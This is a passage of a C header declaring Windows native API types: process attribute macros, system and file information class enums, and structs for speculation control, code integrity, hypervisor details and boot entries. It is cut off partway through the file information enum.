PS_ATTRIBUTE_SECURE_PROCESS \\\n PsAttributeValue(PsAttributeSecureProcess, FALSE, TRUE, FALSE)\n#define PS_ATTRIBUTE_JOB_LIST \\\n PsAttributeValue(PsAttributeJobList, FALSE, TRUE, FALSE)\n#define PS_ATTRIBUTE_CHILD_PROCESS_POLICY \\\n PsAttributeValue(PsAttributeChildProcessPolicy, FALSE, TRUE, FALSE)\n#define PS_ATTRIBUTE_ALL_APPLICATION_PACKAGES_POLICY \\\n PsAttributeValue(PsAttributeAllApplicationPackagesPolicy, FALSE, TRUE, FALSE)\n#define PS_ATTRIBUTE_WIN32K_FILTER \\\n PsAttributeValue(PsAttributeWin32kFilter, FALSE, TRUE, FALSE)\n#define PS_ATTRIBUTE_SAFE_OPEN_PROMPT_ORIGIN_CLAIM \\\n PsAttributeValue(PsAttributeSafeOpenPromptOriginClaim, FALSE, TRUE, FALSE)\n#define PS_ATTRIBUTE_BNO_ISOLATION \\\n PsAttributeValue(PsAttributeBnoIsolation, FALSE, TRUE, FALSE)\n#define PS_ATTRIBUTE_DESKTOP_APP_POLICY \\\n PsAttributeValue(PsAttributeDesktopAppPolicy, FALSE, TRUE, FALSE)\n#define PS_ATTRIBUTE_CHPE \\\n PsAttributeValue(PsAttributeChpe, FALSE, TRUE, TRUE)\n#define PS_ATTRIBUTE_MITIGATION_AUDIT_OPTIONS \\\n PsAttributeValue(PsAttributeMitigationAuditOptions, FALSE, TRUE, FALSE)\n#define PS_ATTRIBUTE_MACHINE_TYPE \\\n PsAttributeValue(PsAttributeMachineType, FALSE, TRUE, TRUE)\n#define PS_ATTRIBUTE_COMPONENT_FILTER \\\n PsAttributeValue(PsAttributeComponentFilter, FALSE, TRUE, FALSE)\n#define PS_ATTRIBUTE_ENABLE_OPTIONAL_XSTATE_FEATURES \\\n PsAttributeValue(PsAttributeEnableOptionalXStateFeatures, TRUE, TRUE, FALSE)\n\n#define RTL_USER_PROC_PARAMS_NORMALIZED 0x00000001\n#define RTL_USER_PROC_PROFILE_USER 0x00000002\n#define RTL_USER_PROC_PROFILE_KERNEL 0x00000004\n#define RTL_USER_PROC_PROFILE_SERVER 0x00000008\n#define RTL_USER_PROC_RESERVE_1MB 0x00000020\n#define RTL_USER_PROC_RESERVE_16MB 0x00000040\n#define RTL_USER_PROC_CASE_SENSITIVE 0x00000080\n#define RTL_USER_PROC_DISABLE_HEAP_DECOMMIT 0x00000100\n#define RTL_USER_PROC_DLL_REDIRECTION_LOCAL 0x00001000\n#define RTL_USER_PROC_APP_MANIFEST_PRESENT 0x00002000\n#define RTL_USER_PROC_IMAGE_KEY_MISSING 0x00004000\n#define RTL_USER_PROC_DEV_OVERRIDE_ENABLED 0x00008000\n#define RTL_USER_PROC_OPTIN_PROCESS 0x00020000\n#define RTL_USER_PROC_SESSION_OWNER 0x00040000\n#define RTL_USER_PROC_HANDLE_USER_CALLBACK_EXCEPTIONS 0x00080000\n#define RTL_USER_PROC_PROTECTED_PROCESS 0x00400000\n#define RTL_USER_PROC_SECURE_PROCESS 0x80000000\n\ntypedef struct _PROCESS_HANDLE_TRACING_ENABLE {\n ULONG Flags;\n} PROCESS_HANDLE_TRACING_ENABLE, * PPROCESS_HANDLE_TRACING_ENABLE;\n\n#define PROCESS_HANDLE_TRACING_MAX_SLOTS 0x20000\n\ntypedef struct _PROCESS_HANDLE_TRACING_ENABLE_EX {\n ULONG Flags;\n ULONG TotalSlots;\n} PROCESS_HANDLE_TRACING_ENABLE_EX, * PPROCESS_HANDLE_TRACING_ENABLE_EX;\n\n#define PROCESS_HANDLE_TRACING_MAX_STACKS 16\n\n#define PROCESS_HANDLE_TRACE_TYPE_OPEN 1\n#define PROCESS_HANDLE_TRACE_TYPE_CLOSE 2\n#define PROCESS_HANDLE_TRACE_TYPE_BADREF 3\n\ntypedef struct _PROCESS_HANDLE_TRACING_ENTRY {\n HANDLE Handle;\n CLIENT_ID ClientId;\n ULONG Type;\n PVOID Stacks[PROCESS_HANDLE_TRACING_MAX_STACKS];\n} PROCESS_HANDLE_TRACING_ENTRY, * PPROCESS_HANDLE_TRACING_ENTRY;\n\ntypedef struct _PROCESS_HANDLE_TRACING_QUERY {\n HANDLE Handle;\n ULONG TotalTraces;\n PROCESS_HANDLE_TRACING_ENTRY HandleTrace[1];\n} PROCESS_HANDLE_TRACING_QUERY, * PPROCESS_HANDLE_TRACING_QUERY;\n\ntypedef struct _PROCESS_WS_WATCH_INFORMATION {\n PVOID FaultingPc;\n PVOID FaultingVa;\n} PROCESS_WS_WATCH_INFORMATION, * PPROCESS_WS_WATCH_INFORMATION;\n\ntypedef struct _PROCESS_WS_WATCH_INFORMATION_EX {\n PROCESS_WS_WATCH_INFORMATION BasicInfo;\n ULONG_PTR FaultingThreadId;\n ULONG_PTR Flags;\n} PROCESS_WS_WATCH_INFORMATION_EX, * PPROCESS_WS_WATCH_INFORMATION_EX;\n\ntypedef struct _PROCESS_INSTRUMENTATION_CALLBACK_INFORMATION {\n ULONG Version;\n ULONG Reserved;\n PVOID Callback;\n} PROCESS_INSTRUMENTATION_CALLBACK_INFORMATION, * PPROCESS_INSTRUMENTATION_CALLBACK_INFORMATION;\n\n/*\n** Processes END\n*/\n\ntypedef enum _SYSTEM_INFORMATION_CLASS {\n SystemBasicInformation = 0,\n SystemProcessorInformation = 1,\n SystemPerformanceInformation = 2,\n SystemTimeOfDayInformation = 3,\n SystemPathInformation = 4,\n SystemProcessInformation = 5,\n SystemCallCountInformation = 6,\n SystemDeviceInformation = 7,\n SystemProcessorPerformanceInformation = 8,\n SystemFlagsInformation = 9,\n SystemCallTimeInformation = 10,\n SystemModuleInformation = 11,\n SystemLocksInformation = 12,\n SystemStackTraceInformation = 13,\n SystemPagedPoolInformation = 14,\n SystemNonPagedPoolInformation = 15,\n SystemHandleInformation = 16,\n SystemObjectInformation = 17,\n SystemPageFileInformation = 18,\n SystemVdmInstemulInformation = 19,\n SystemVdmBopInformation = 20,\n SystemFileCacheInformation = 21,\n SystemPoolTagInformation = 22,\n SystemInterruptInformation = 23,\n SystemDpcBehaviorInformation = 24,\n SystemFullMemoryInformation = 25,\n SystemLoadGdiDriverInformation = 26,\n SystemUnloadGdiDriverInformation = 27,\n SystemTimeAdjustmentInformation = 28,\n SystemSummaryMemoryInformation = 29,\n SystemMirrorMemoryInformation = 30,\n SystemPerformanceTraceInformation = 31,\n SystemObsolete0 = 32,\n SystemExceptionInformation = 33,\n SystemCrashDumpStateInformation = 34,\n SystemKernelDebuggerInformation = 35,\n SystemContextSwitchInformation = 36,\n SystemRegistryQuotaInformation = 37,\n SystemExtendServiceTableInformation = 38,\n SystemPrioritySeperation = 39,\n SystemVerifierAddDriverInformation = 40,\n SystemVerifierRemoveDriverInformation = 41,\n SystemProcessorIdleInformation = 42,\n SystemLegacyDriverInformation = 43,\n SystemCurrentTimeZoneInformation = 44,\n SystemLookasideInformation = 45,\n SystemTimeSlipNotification = 46,\n SystemSessionCreate = 47,\n SystemSessionDetach = 48,\n SystemSessionInformation = 49,\n SystemRangeStartInformation = 50,\n SystemVerifierInformation = 51,\n SystemVerifierThunkExtend = 52,\n SystemSessionProcessInformation = 53,\n SystemLoadGdiDriverInSystemSpace = 54,\n SystemNumaProcessorMap = 55,\n SystemPrefetcherInformation = 56,\n SystemExtendedProcessInformation = 57,\n SystemRecommendedSharedDataAlignment = 58,\n SystemComPlusPackage = 59,\n SystemNumaAvailableMemory = 60,\n SystemProcessorPowerInformation = 61,\n SystemEmulationBasicInformation = 62,\n SystemEmulationProcessorInformation = 63,\n SystemExtendedHandleInformation = 64,\n SystemLostDelayedWriteInformation = 65,\n SystemBigPoolInformation = 66,\n SystemSessionPoolTagInformation = 67,\n SystemSessionMappedViewInformation = 68,\n SystemHotpatchInformation = 69,\n SystemObjectSecurityMode = 70,\n SystemWatchdogTimerHandler = 71,\n SystemWatchdogTimerInformation = 72,\n SystemLogicalProcessorInformation = 73,\n SystemWow64SharedInformationObsolete = 74,\n SystemRegisterFirmwareTableInformationHandler = 75,\n SystemFirmwareTableInformation = 76,\n SystemModuleInformationEx = 77,\n SystemVerifierTriageInformation = 78,\n SystemSuperfetchInformation = 79,\n SystemMemoryListInformation = 80,\n SystemFileCacheInformationEx = 81,\n SystemThreadPriorityClientIdInformation = 82,\n SystemProcessorIdleCycleTimeInformation = 83,\n SystemVerifierCancellationInformation = 84,\n SystemProcessorPowerInformationEx = 85,\n SystemRefTraceInformation = 86,\n SystemSpecialPoolInformation = 87,\n SystemProcessIdInformation = 88,\n SystemErrorPortInformation = 89,\n SystemBootEnvironmentInformation = 90,\n SystemHypervisorInformation = 91,\n SystemVerifierInformationEx = 92,\n SystemTimeZoneInformation = 93,\n SystemImageFileExecutionOptionsInformation = 94,\n SystemCoverageInformation = 95,\n SystemPrefetchPatchInformation = 96,\n SystemVerifierFaultsInformation = 97,\n SystemSystemPartitionInformation = 98,\n SystemSystemDiskInformation = 99,\n SystemProcessorPerformanceDistribution = 100,\n SystemNumaProximityNodeInformation = 101,\n SystemDynamicTimeZoneInformation = 102,\n SystemCodeIntegrityInformation = 103,\n SystemProcessorMicrocodeUpdateInformation = 104,\n SystemProcessorBrandString = 105,\n SystemVirtualAddressInformation = 106,\n SystemLogicalProcessorAndGroupInformation = 107,\n SystemProcessorCycleTimeInformation = 108,\n SystemStoreInformation = 109,\n SystemRegistryAppendString = 110,\n SystemAitSamplingValue = 111,\n SystemVhdBootInformation = 112,\n SystemCpuQuotaInformation = 113,\n SystemNativeBasicInformation = 114,\n SystemErrorPortTimeouts = 115,\n SystemLowPriorityIoInformation = 116,\n SystemBootEntropyInformation = 117,\n SystemVerifierCountersInformation = 118,\n SystemPagedPoolInformationEx = 119,\n SystemSystemPtesInformationEx = 120,\n SystemNodeDistanceInformation = 121,\n SystemAcpiAuditInformation = 122,\n SystemBasicPerformanceInformation = 123,\n SystemQueryPerformanceCounterInformation = 124,\n SystemSessionBigPoolInformation = 125,\n SystemBootGraphicsInformation = 126,\n SystemScrubPhysicalMemoryInformation = 127,\n SystemBadPageInformation = 128,\n SystemProcessorProfileControlArea = 129,\n SystemCombinePhysicalMemoryInformation = 130,\n SystemEntropyInterruptTimingInformation = 131,\n SystemConsoleInformation = 132,\n SystemPlatformBinaryInformation = 133,\n SystemPolicyInformation = 134,\n SystemHypervisorProcessorCountInformation = 135,\n SystemDeviceDataInformation = 136,\n SystemDeviceDataEnumerationInformation = 137,\n SystemMemoryTopologyInformation = 138,\n SystemMemoryChannelInformation = 139,\n SystemBootLogoInformation = 140,\n SystemProcessorPerformanceInformationEx = 141,\n SystemSpare0 = 142,\n SystemSecureBootPolicyInformation = 143,\n SystemPageFileInformationEx = 144,\n SystemSecureBootInformation = 145,\n SystemEntropyInterruptTimingRawInformation = 146,\n SystemPortableWorkspaceEfiLauncherInformation = 147,\n SystemFullProcessInformation = 148,\n SystemKernelDebuggerInformationEx = 149,\n SystemBootMetadataInformation = 150,\n SystemSoftRebootInformation = 151,\n SystemElamCertificateInformation = 152,\n SystemOfflineDumpConfigInformation = 153,\n SystemProcessorFeaturesInformation = 154,\n SystemRegistryReconciliationInformation = 155,\n SystemEdidInformation = 156,\n SystemManufacturingInformation = 157,\n SystemEnergyEstimationConfigInformation = 158,\n SystemHypervisorDetailInformation = 159,\n SystemProcessorCycleStatsInformation = 160,\n SystemVmGenerationCountInformation = 161,\n SystemTrustedPlatformModuleInformation = 162,\n SystemKernelDebuggerFlags = 163,\n SystemCodeIntegrityPolicyInformation = 164,\n SystemIsolatedUserModeInformation = 165,\n SystemHardwareSecurityTestInterfaceResultsInformation = 166,\n SystemSingleModuleInformation = 167,\n SystemAllowedCpuSetsInformation = 168,\n SystemVsmProtectionInformation = 169, //ex SystemDmaProtectionInformation\n SystemInterruptCpuSetsInformation = 170,\n SystemSecureBootPolicyFullInformation = 171,\n SystemCodeIntegrityPolicyFullInformation = 172,\n SystemAffinitizedInterruptProcessorInformation = 173,\n SystemRootSiloInformation = 174,\n SystemCpuSetInformation = 175,\n SystemCpuSetTagInformation = 176,\n SystemWin32WerStartCallout = 177,\n SystemSecureKernelProfileInformation = 178,\n SystemCodeIntegrityPlatformManifestInformation = 179,\n SystemInterruptSteeringInformation = 180,\n SystemSupportedProcessorArchitectures = 181,\n SystemMemoryUsageInformation = 182,\n SystemCodeIntegrityCertificateInformation = 183,\n SystemPhysicalMemoryInformation = 184,\n SystemControlFlowTransition = 185,\n SystemKernelDebuggingAllowed = 186,\n SystemActivityModerationExeState = 187,\n SystemActivityModerationUserSettings = 188,\n SystemCodeIntegrityPoliciesFullInformation = 189,\n SystemCodeIntegrityUnlockInformation = 190,\n SystemIntegrityQuotaInformation = 191,\n SystemFlushInformation = 192,\n SystemProcessorIdleMaskInformation = 193,\n SystemSecureDumpEncryptionInformation = 194,\n SystemWriteConstraintInformation = 195,\n SystemKernelVaShadowInformation = 196,\n SystemHypervisorSharedPageInformation = 197,\n SystemFirmwareBootPerformanceInformation = 198,\n SystemCodeIntegrityVerificationInformation = 199,\n SystemFirmwarePartitionInformation = 200,\n SystemSpeculationControlInformation = 201,\n SystemDmaGuardPolicyInformation = 202,\n SystemEnclaveLaunchControlInformation = 203,\n SystemWorkloadAllowedCpuSetsInformation = 204,\n SystemCodeIntegrityUnlockModeInformation = 205,\n SystemLeapSecondInformation = 206,\n SystemFlags2Information = 207,\n SystemSecurityModelInformation = 208,\n SystemCodeIntegritySyntheticCacheInformation = 209,\n SystemFeatureConfigurationInformation = 210,\n SystemFeatureConfigurationSectionInformation = 211,\n SystemFeatureUsageSubscriptionInformation = 212,\n SystemSecureSpeculationControlInformation = 213,\n SystemSpacesBootInformation = 214,\n SystemFwRamdiskInformation = 215,\n SystemWheaIpmiHardwareInformation = 216,\n SystemDifSetRuleClassInformation = 217,\n SystemDifClearRuleClassInformation = 218,\n SystemDifApplyPluginVerificationOnDriver = 219,\n SystemDifRemovePluginVerificationOnDriver = 220,\n SystemShadowStackInformation = 221,\n SystemBuildVersionInformation = 222,\n SystemPoolLimitInformation = 223,\n SystemCodeIntegrityAddDynamicStore = 224,\n SystemCodeIntegrityClearDynamicStores = 225,\n SystemDifPoolTrackingInformation = 226,\n SystemPoolZeroingInformation = 227,\n SystemDpcWatchdogInformation = 228,\n SystemDpcWatchdogInformation2 = 229,\n SystemSupportedProcessorArchitectures2 = 230,\n SystemSingleProcessorRelationshipInformation = 231,\n SystemXfgCheckFailureInformation = 232,\n SystemIommuStateInformation = 233,\n SystemHypervisorMinrootInformation = 234,\n SystemHypervisorBootPagesInformation = 235,\n SystemPointerAuthInformation = 236,\n SystemSecureKernelDebuggerInformation = 237,\n SystemOriginalImageFeatureInformation = 238,\n SystemMemoryNumaInformation = 239,\n SystemMemoryNumaPerformanceInformation = 240,\n SystemCodeIntegritySignedPoliciesFullInformation = 241,\n SystemSecureSecretsInformation = 242,\n SystemTrustedAppsRuntimeInformation = 243,\n SystemBadPageInformationEx = 244,\n SystemResourceDeadlockTimeout = 245,\n SystemBreakOnContextUnwindFailureInformation = 246,\n SystemOslRamdiskInformation = 247,\n SystemCodeIntegrityPolicyManagementInformation = 248,\n SystemMemoryNumaCacheInformation = 249,\n SystemProcessorFeaturesBitMapInformation = 250,\n SystemRefTraceInformationEx = 251,\n SystemBasicProcessInformation = 252,\n SystemHandleCountInformation = 253,\n MaxSystemInfoClass\n} SYSTEM_INFORMATION_CLASS, * PSYSTEM_INFORMATION_CLASS;\n\ntypedef struct _SYSTEM_VSM_PROTECTION_INFORMATION {\n CHAR DmaProtectionsAvailable;\n CHAR DmaProtectionsInUse;\n CHAR HardwareMbecAvailable;\n CHAR ApicVirtualizationAvailable;\n} SYSTEM_VSM_PROTECTION_INFORMATION, * PSYSTEM_VSM_PROTECTION_INFORMATION;\n\n//msdn.microsoft.com/en-us/library/windows/desktop/ms724509(v=vs.85).aspx\ntypedef struct _SYSTEM_SPECULATION_CONTROL_INFORMATION {\n union {\n ULONG Flags;\n struct {\n ULONG BpbEnabled : 1;\n ULONG BpbDisabledSystemPolicy : 1;\n ULONG BpbDisabledNoHardwareSupport : 1;\n ULONG SpecCtrlEnumerated : 1;\n ULONG SpecCmdEnumerated : 1;\n ULONG IbrsPresent : 1;\n ULONG StibpPresent : 1;\n ULONG SmepPresent : 1;\n ULONG SpeculativeStoreBypassDisableAvailable : 1;\n ULONG SpeculativeStoreBypassDisableSupported : 1;\n ULONG SpeculativeStoreBypassDisabledSystemWide : 1;\n ULONG SpeculativeStoreBypassDisabledKernel : 1;\n ULONG SpeculativeStoreBypassDisableRequired : 1;\n ULONG BpbDisabledKernelToUser : 1;\n ULONG SpecCtrlRetpolineEnabled : 1;\n ULONG SpecCtrlImportOptimizationEnabled : 1;\n ULONG EnhancedIbrs : 1;\n ULONG HvL1tfStatusAvailable : 1;\n ULONG HvL1tfProcessorNotAffected : 1;\n ULONG HvL1tfMigitationEnabled : 1;\n ULONG HvL1tfMigitationNotEnabled_Hardware : 1;\n ULONG HvL1tfMigitationNotEnabled_LoadOption : 1;\n ULONG HvL1tfMigitationNotEnabled_CoreScheduler : 1;\n ULONG EnhancedIbrsReported : 1;\n ULONG MdsHardwareProtected : 1;\n ULONG MbClearEnabled : 1;\n ULONG MbClearReported : 1;\n ULONG TsxCtrlStatus : 2;\n ULONG TsxCtrlReported : 1;\n ULONG TaaHardwareImmune : 1;\n ULONG Reserved : 1;\n } SpeculationControlFlags;\n };\n} SYSTEM_SPECULATION_CONTROL_INFORMATION, *PSYSTEM_SPECULATION_CONTROL_INFORMATION;\n\ntypedef struct _SYSTEM_SPECULATION_CONTROL_INFORMATION_V2 {\n union {\n ULONG Flags;\n struct {\n ULONG BpbEnabled : 1;\n ULONG BpbDisabledSystemPolicy : 1;\n ULONG BpbDisabledNoHardwareSupport : 1;\n ULONG SpecCtrlEnumerated : 1;\n ULONG SpecCmdEnumerated : 1;\n ULONG IbrsPresent : 1;\n ULONG StibpPresent : 1;\n ULONG SmepPresent : 1;\n ULONG SpeculativeStoreBypassDisableAvailable : 1;\n ULONG SpeculativeStoreBypassDisableSupported : 1;\n ULONG SpeculativeStoreBypassDisabledSystemWide : 1;\n ULONG SpeculativeStoreBypassDisabledKernel : 1;\n ULONG SpeculativeStoreBypassDisableRequired : 1;\n ULONG BpbDisabledKernelToUser : 1;\n ULONG SpecCtrlRetpolineEnabled : 1;\n ULONG SpecCtrlImportOptimizationEnabled : 1;\n ULONG EnhancedIbrs : 1;\n ULONG HvL1tfStatusAvailable : 1;\n ULONG HvL1tfProcessorNotAffected : 1;\n ULONG HvL1tfMigitationEnabled : 1;\n ULONG HvL1tfMigitationNotEnabled_Hardware : 1;\n ULONG HvL1tfMigitationNotEnabled_LoadOption : 1;\n ULONG HvL1tfMigitationNotEnabled_CoreScheduler : 1;\n ULONG EnhancedIbrsReported : 1;\n ULONG MdsHardwareProtected : 1;\n ULONG MbClearEnabled : 1;\n ULONG MbClearReported : 1;\n ULONG TsxCtrlStatus : 2;\n ULONG TsxCtrlReported : 1;\n ULONG TaaHardwareImmune : 1;\n ULONG Reserved : 1;\n } SpeculationControlFlags;\n };\n union {\n ULONG Flags2;\n struct {\n ULONG SbdrSsdpHardwareProtected : 1;\n ULONG FbsdpHardwareProtected : 1;\n ULONG PsdpHardwareProtected : 1;\n ULONG FbClearEnabled : 1;\n ULONG FbClearReported : 1;\n ULONG BhbEnabled : 1;\n ULONG BhbDisabledSystemPolicy : 1;\n ULONG BhbDisabledNoHardwareSupport : 1;\n ULONG BranchConfusionStatus : 2;\n ULONG BranchConfusionReported : 1;\n ULONG RdclHardwareProtectedReported : 1;\n ULONG RdclHardwareProtected : 1;\n ULONG Reserved3 : 4;\n ULONG Reserved4 : 3;\n ULONG DivideByZeroReported : 1;\n ULONG DivideByZeroStatus : 1;\n ULONG Reserved5 : 3;\n ULONG Reserved : 7;\n } SpeculationControlFlags2;\n };\n} SYSTEM_SPECULATION_CONTROL_INFORMATION_V2, * PSYSTEM_SPECULATION_CONTROL_INFORMATION_V2;\n\ntypedef struct _SYSTEM_KERNEL_VA_SHADOW_INFORMATION {\n union {\n ULONG Flags;\n struct {\n ULONG KvaShadowEnabled : 1;\n ULONG KvaShadowUserGlobal : 1;\n ULONG KvaShadowPcid : 1;\n ULONG KvaShadowInvpcid : 1;\n ULONG KvaShadowRequired : 1;\n ULONG KvaShadowRequiredAvailable : 1;\n ULONG InvalidPteBit : 6;\n ULONG L1DataCacheFlushSupported : 1;\n ULONG L1TerminalFaultMitigationPresent : 1;\n ULONG Reserved : 18;\n } KvaShadowFlags;\n };\n} SYSTEM_KERNEL_VA_SHADOW_INFORMATION, *PSYSTEM_KERNEL_VA_SHADOW_INFORMATION;\n\ntypedef struct _SYSTEM_CODEINTEGRITY_INFORMATION {\n ULONG Length;\n ULONG CodeIntegrityOptions;\n} SYSTEM_CODEINTEGRITY_INFORMATION, *PSYSTEM_CODEINTEGRITY_INFORMATION;\n\n#define CODEINTEGRITY_OPTION_ENABLED 0x01\n#define CODEINTEGRITY_OPTION_TESTSIGN 0x02\n#define CODEINTEGRITY_OPTION_UMCI_ENABLED 0x04\n#define CODEINTEGRITY_OPTION_UMCI_AUDITMODE_ENABLED 0x08\n#define CODEINTEGRITY_OPTION_UMCI_EXCLUSIONPATHS_ENABLED 0x10\n#define CODEINTEGRITY_OPTION_TEST_BUILD 0x20\n#define CODEINTEGRITY_OPTION_PREPRODUCTION_BUILD 0x40\n#define CODEINTEGRITY_OPTION_DEBUGMODE_ENABLED 0x80\n#define CODEINTEGRITY_OPTION_FLIGHT_BUILD 0x100\n#define CODEINTEGRITY_OPTION_FLIGHTING_ENABLED 0x200\n#define CODEINTEGRITY_OPTION_HVCI_KMCI_ENABLED 0x400\n#define CODEINTEGRITY_OPTION_HVCI_KMCI_AUDITMODE_ENABLED 0x800\n#define CODEINTEGRITY_OPTION_HVCI_KMCI_STRICTMODE_ENABLED 0x1000\n#define CODEINTEGRITY_OPTION_HVCI_IUM_ENABLED 0x2000\n#define CODEINTEGRITY_OPTION_WHQL_ENFORCEMENT_ENABLED 0x4000\n#define CODEINTEGRITY_OPTION_WHQL_AUDITMODE_ENABLED 0x8000\n\ntypedef struct _HV_DETAILS {\n ULONG Data[4];\n} HV_DETAILS, * PHV_DETAILS;\n\ntypedef struct _HV_VENDOR_AND_MAX_FUNCTION {\n ULONG MaxFunction;\n CHAR VendorName[12];\n} HV_VENDOR_AND_MAX_FUNCTION, * PHV_VENDOR_AND_MAX_FUNCTION;\n\ntypedef struct _SYSTEM_HYPERVISOR_DETAIL_INFORMATION {\n HV_DETAILS HvVendorAndMaxFunction;\n HV_DETAILS HypervisorInterface;\n HV_DETAILS HypervisorVersion;\n HV_DETAILS HvFeatures;\n HV_DETAILS HwFeatures;\n HV_DETAILS EnlightenmentInfo;\n HV_DETAILS ImplementationLimits;\n} SYSTEM_HYPERVISOR_DETAIL_INFORMATION, * PSYSTEM_HYPERVISOR_DETAIL_INFORMATION;\n\ntypedef struct _SYSTEM_HYPERVISOR_QUERY_INFORMATION {\n BOOLEAN HypervisorConnected;\n BOOLEAN HypervisorDebuggingEnabled;\n BOOLEAN HypervisorPresent;\n BOOLEAN Spare0[5];\n ULONGLONG EnabledEnlightenments;\n} SYSTEM_HYPERVISOR_QUERY_INFORMATION, * PSYSTEM_HYPERVISOR_QUERY_INFORMATION;\n\ntypedef VOID(NTAPI *PIO_APC_ROUTINE)(\n _In_ PVOID ApcContext,\n _In_ PIO_STATUS_BLOCK IoStatusBlock,\n _In_ ULONG Reserved\n );\n\n#define InitializeObjectAttributes( p, n, a, r, s ) { \\\n (p)->Length = sizeof( OBJECT_ATTRIBUTES ); \\\n (p)->RootDirectory = r; \\\n (p)->Attributes = a; \\\n (p)->ObjectName = n; \\\n (p)->SecurityDescriptor = s; \\\n (p)->SecurityQualityOfService = NULL; \\\n }\n\ntypedef struct _SYSTEM_VHD_BOOT_INFORMATION {\n BOOLEAN OsDiskIsVhd;\n ULONG OsVhdFilePathOffset;\n WCHAR OsVhdParentVolume[ANYSIZE_ARRAY];\n} SYSTEM_VHD_BOOT_INFORMATION, *PSYSTEM_VHD_BOOT_INFORMATION;\n\ntypedef struct _SYSTEM_OBJECTTYPE_INFORMATION {\n ULONG NextEntryOffset;\n ULONG NumberOfObjects;\n ULONG NumberOfHandles;\n ULONG TypeIndex;\n ULONG InvalidAttributes;\n GENERIC_MAPPING GenericMapping;\n ULONG ValidAccessMask;\n ULONG PoolType;\n BOOLEAN SecurityRequired;\n BOOLEAN WaitableObject;\n UNICODE_STRING TypeName;\n} SYSTEM_OBJECTTYPE_INFORMATION, *PSYSTEM_OBJECTTYPE_INFORMATION;\n\ntypedef struct _SYSTEM_OBJECT_INFORMATION {\n ULONG NextEntryOffset;\n PVOID Object;\n HANDLE CreatorUniqueProcess;\n USHORT CreatorBackTraceIndex;\n USHORT Flags;\n LONG PointerCount;\n LONG HandleCount;\n ULONG PagedPoolCharge;\n ULONG NonPagedPoolCharge;\n HANDLE ExclusiveProcessId;\n PVOID SecurityDescriptor;\n UNICODE_STRING NameInfo;\n} SYSTEM_OBJECT_INFORMATION, *PSYSTEM_OBJECT_INFORMATION;\n\n/*\n** Boot Entry START\n*/\n\ntypedef struct _FILE_PATH {\n ULONG Version;\n ULONG Length;\n ULONG Type;\n UCHAR FilePath[ANYSIZE_ARRAY];\n} FILE_PATH, *PFILE_PATH;\n\ntypedef struct _BOOT_ENTRY {\n ULONG Version;\n ULONG Length;\n ULONG Id;\n ULONG Attributes;\n ULONG FriendlyNameOffset;\n ULONG BootFilePathOffset;\n ULONG OsOptionsLength;\n UCHAR OsOptions[ANYSIZE_ARRAY];\n} BOOT_ENTRY, *PBOOT_ENTRY;\n\ntypedef struct _BOOT_ENTRY_LIST {\n ULONG NextEntryOffset;\n BOOT_ENTRY BootEntry;\n} BOOT_ENTRY_LIST, *PBOOT_ENTRY_LIST;\n\n/*\n** Boot Entry END\n*/\n\n/*\n** File start\n*/\n\n#define FILE_SUPERSEDE 0x00000000\n#define FILE_OPEN 0x00000001\n#define FILE_CREATE 0x00000002\n#define FILE_OPEN_IF 0x00000003\n#define FILE_OVERWRITE 0x00000004\n#define FILE_OVERWRITE_IF 0x00000005\n#define FILE_MAXIMUM_DISPOSITION 0x00000005\n\n#define FILE_DIRECTORY_FILE 0x00000001\n#define FILE_WRITE_THROUGH 0x00000002\n#define FILE_SEQUENTIAL_ONLY 0x00000004\n#define FILE_NO_INTERMEDIATE_BUFFERING 0x00000008\n\n#define FILE_SYNCHRONOUS_IO_ALERT 0x00000010\n#define FILE_SYNCHRONOUS_IO_NONALERT 0x00000020\n#define FILE_NON_DIRECTORY_FILE 0x00000040\n#define FILE_CREATE_TREE_CONNECTION 0x00000080\n\n#define FILE_COMPLETE_IF_OPLOCKED 0x00000100\n#define FILE_NO_EA_KNOWLEDGE 0x00000200\n#define FILE_OPEN_FOR_RECOVERY 0x00000400\n#define FILE_RANDOM_ACCESS 0x00000800\n\n#define FILE_DELETE_ON_CLOSE 0x00001000\n#define FILE_OPEN_BY_FILE_ID 0x00002000\n#define FILE_OPEN_FOR_BACKUP_INTENT 0x00004000\n#define FILE_NO_COMPRESSION 0x00008000\n\n#define FILE_RESERVE_OPFILTER 0x00100000\n#define FILE_OPEN_REPARSE_POINT 0x00200000\n#define FILE_OPEN_NO_RECALL 0x00400000\n#define FILE_OPEN_FOR_FREE_SPACE_QUERY 0x00800000\n\n\n#define FILE_COPY_STRUCTURED_STORAGE 0x00000041\n#define FILE_STRUCTURED_STORAGE 0x00000441\n\n#define FILE_VALID_OPTION_FLAGS 0x00ffffff\n#define FILE_VALID_PIPE_OPTION_FLAGS 0x00000032\n#define FILE_VALID_MAILSLOT_OPTION_FLAGS 0x00000032\n#define FILE_VALID_SET_FLAGS 0x00000036\n\ntypedef enum _FILE_INFORMATION_CLASS {\n FileDirectoryInformation = 1,\n FileFullDirectoryInformation,\n FileBothDirectoryInformation,\n FileBasicInformation,\n FileStandardInformation,\n FileInternalInformation,\n FileEaInformation,\n FileAccessInformation,\n FileNameInformation,\n FileRenameInformation,\n FileLinkInformation,\n FileNamesInformation,\n FileDispositionInformation,\n FilePositionInformation,\n FileFullEaInformation,\n FileModeInformation,\n FileAlignmentInformation,\n FileAllInformation,\n FileAllocationInformation,\n FileEndOfFileInformation,\n FileAlternateNameInformation,\n FileStreamInformation,\n FilePipeInformation,\n FilePipeLocalInformation,\n FilePipeRemoteInformation,\n FileMailslotQueryInformation,\n FileMailslotSetInformation,\n FileCompressionInformation,\n FileObjectIdInformation,\n FileCompletionInformation,\n FileMoveClusterInformation,\n FileQuotaInformation,\n FileReparsePointInformation,\n FileNetworkOpenInformation,\n FileAttributeTagInformation,\n FileTrackingInformation,\n FileIdBothDirectoryInformation,\n FileIdFullDirectoryInformation,\n FileValidDataLengthInformation,\n FileShortNameInformation,\n FileIoCompletionNotificationInformation,\n FileIoStatusBlockRangeInformation,\n FileIoPriorityHintInformation,\n FileSfioReserveInformation,\n FileSfioVolumeInformation,\n FileHardLinkInformation,\n FileProcessIdsUsingFileInformation,\n FileNormalizedNameInformation,\n FileNetworkPhysicalNameInformation,\n FileIdGlobalTxDirectoryInformation,\n FileIsRemoteDeviceInformation,\n FileUnusedInformation,\n FileNumaNodeInformation,\n FileStandardLinkInformation,\n FileRemoteProtocolInformation,\n FileRenameInformationBypassAccessCheck,\n FileLinkInformationBypassAccessCheck,\n FileVolumeNameInformation,\n FileIdInformation,\n FileIdExtdDirectoryInformation,\n FileReplaceCompletionInformation,\n FileHardLinkFullIdInformation,\n FileIdExtdBothDirectoryInformation,\n FileDispositionInformationEx,\n FileRenameInformationEx,\n 